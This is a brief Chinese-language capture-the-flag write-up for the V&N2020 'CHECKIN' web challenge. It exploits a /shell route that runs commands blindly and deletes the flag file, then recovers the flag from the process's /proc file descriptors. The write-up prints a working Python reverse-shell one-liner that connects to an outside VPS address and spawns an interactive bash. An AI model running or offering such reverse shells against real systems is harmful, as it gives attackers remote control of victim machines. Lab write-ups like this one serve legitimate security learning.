V&N2020 公开赛 CHECKIN
这题直接给出了源代码,不是很多,也很简单
直接访问/flag是拿不到flag的
而访问/shell虽然可以执行一条传入的命令,但是它会把存放flag的txt文件给删掉
而且由于/shell路由返回的是1,所以我们是看不到命令执行后的回显的,那就只能弹shell了
因为这里是python环境下,所以去找了python环境下反弹shell相关文章
emem我就拿了这个改成了自己的vps地址,这里得注意一点,估计是靶机环境的缘故,得是python3才能执行
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("42.193.22.50",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
这道题因为程序把flag文件给删掉了,但是程序还在运行着,所以flag其实已经被加载到了程序的fd文件夹里,我们去里面找就行,具体原理之前写过一篇Linux的/proc/self/学习里面有讲